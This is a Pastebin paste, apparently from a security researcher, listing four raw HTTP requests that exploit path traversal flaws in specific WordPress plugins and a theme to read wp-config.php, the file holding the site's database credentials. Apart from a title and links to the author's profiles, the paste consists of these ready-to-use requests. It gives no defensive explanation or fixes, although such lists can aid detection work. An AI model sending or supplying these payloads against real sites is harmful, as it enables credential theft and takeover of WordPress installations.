Neonprimetime

Wordpress file traversal attacks

Aug 12th, 2016
296
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.55 KB | None | 0 0
  1. Wordpress file traversal attacks
  2. ***********
  3.  
  4. GET/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php HTTP/1.1
  5. User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
  6. Content-Type: application/x-www-form-urlencoded
  7. Accept: */*
  8. Host: www.mywebsite.com
  9. Accept-Encoding: gzip, deflate
  10. Connection: Keep-Alive
  11.  
  12.  
  13. GET/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php HTTP/1.1
  14. User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
  15. Content-Type: application/x-www-form-urlencoded
  16. Accept: */*
  17. Host: www.mywebsite.com
  18. Accept-Encoding: gzip, deflate
  19. Connection: Keep-Alive
  20.  
  21. GET/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10 HTTP/1.1
  22. User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
  23. Content-Type: application/x-www-form-urlencoded
  24. Accept: */*
  25. Host: www.mywebsite.com
  26. Accept-Encoding: gzip, deflate
  27. Connection: Keep-Alive
  28.  
  29. GET/wp-content/themes/mtheme-unus/css/css.php?files=../../../../wp-config.php HTTP/1.1
  30. User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
  31. Content-Type: application/x-www-form-urlencoded
  32. Accept: */*
  33. Host: www.mywebsite.com
  34. Accept-Encoding: gzip, deflate
  35. Connection: Keep-Alive
  36.  
  37.  
  38. *******
  39. More FROM @neonprimetime security
  40.  
  41. http://pastebin.com/u/Neonprimetime
  42. https://www.virustotal.com/en/USER/neonprimetime/
  43. https://twitter.com/neonprimetime
  44. https://www.reddit.com/USER/neonprimetime
Add Comment
Please, Sign In to add comment